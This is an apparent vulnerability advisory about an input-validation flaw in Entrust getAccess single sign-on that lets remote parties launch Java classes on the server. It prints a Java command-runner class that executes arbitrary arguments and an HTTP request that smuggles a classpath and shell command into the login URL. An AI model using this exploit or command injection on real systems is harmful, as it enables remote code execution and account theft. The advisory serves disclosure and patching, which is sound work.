COMMAND

    Entrust

SYSTEMS AFFECTED

    Entrust

PROBLEM

    "rudi  carell"  found  following.   getAccess[tm]  is  used  as  a
    single-sign-on system often used for large internet-portals.

    Entrust GetAccess[tm] offers  the most comprehensive  solution for
    consistently deploying and  enforcing basic and  enhanced security
    across  online  applications,  from  Web  browsers,  to enterprise
    applications and legacy database systems.

    Due  to  missing  input-validation  it  is  possible to run(start)
    java-programs on  the "getaccess"-machine.   Combined with  public
    accessibly uploads or any other possibility to create  class-files
    on the server this vulnerability  c ould be used to  run arbitrary
    system  commands  on  the  target  machine  (or  change  getAccess
    parameters and steal any user ac count you want BTW).

    It  should  also  be  possible  (but  not  proven  yet) to exploit
    default-,install- or demo classes  within Java or getAccess  which
    would    make    the    file-upload(creation)    part    unneeded!
    (uninstall.class is very likely an effective DOS).

    Example  (find  exploitable  getAccess-class  [one  which  accepts
    params!] or upload a "command" programm):

        import java.io.*;
        public class cmd {
        public static void main(String args[]) {
        s = null;
        try {
        Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]);
        BufferedReader stdInput = new BufferedReader(new
        InputStreamReader(p.getInputStream()));
        BufferedReader stdError = new BufferedReader(new
        InputStreamReader(p.getErrorStream()));
        System.out.println("Content-type: text/html\n\n");
        while ((s = stdInput.readLine()) != null) { System.out.println(s); }
        while ((s = stdError.readLine()) != null) { System.out.println(s); }
        System.exit(0);
        }
        catch (IOException e) { e.printStackTrace(); System.exit(-1); }
        } }

    Later then .. a http-request to :

        http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

    .. will run "/whereever/cmd.class" and execute "/bin/ls -alsi".

SOLUTION

    This vulnerability has  been confirmed by  Entrust and a  patch is
    forthcoming.  Detailed information  on this issue has  been posted
    to the  Entrust customer  extranet on  both the  Entrust GetAccess
    Portal and the Entrust Customer Support Extranet:

        https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-001.html
        https://www.entrust.com/support/resources/recentsecuritynotes.htm